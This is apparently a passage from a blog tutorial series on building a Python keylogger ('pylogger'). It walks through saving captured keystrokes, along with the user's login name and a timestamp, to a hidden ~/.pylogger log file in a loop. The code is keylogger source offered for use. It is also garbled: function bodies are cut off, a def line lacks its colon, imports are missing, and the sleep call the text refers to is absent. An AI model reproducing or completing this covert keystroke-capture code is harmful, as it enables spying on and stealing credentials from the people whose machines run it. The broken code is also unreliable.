Write Don't Print

Write Don’t Print

A log shouldn’t print to STDOUT, it should append to an existing log file.

More modifications:

The Setup

We need to write to a specific file. So let’s check for an existing directory, and if it doesn’t exist create it. Similarly, let’s create a function to append a line to a file.


from os import mkdir, environ
from os.path import exists

Check for Directory

def check_make_directory(dir_path)
    if not exists(dir_path):

Append Line to File

def append_line(filepath, line):
    with open(filepath, 'a') as the_file:

The Code

Let’s use these new functions:

if __name__ == "__main__":
    log_dir = f"{environ['HOME']}/.pylogger"
    log_file = f"{log_dir}/log"
    while True:
        log = []
        listener = keyboard.Listener(on_press=on_press)
        log_line = f"{getlogin()} -- {asctime(localtime())}: {''.join(log)}"
        append_line(log_file, log_line)

That’ll probably do it.


Write to file output

It created the directory, the log file and started dumping logs into the file.

Looking at the log timestamps it is recording every 10 seconds, we can simply update the sleep() function to wait for however long we want our logs to last, I would choose 60 seconds.

Source Code Snapshot

GitHub repo at this point in time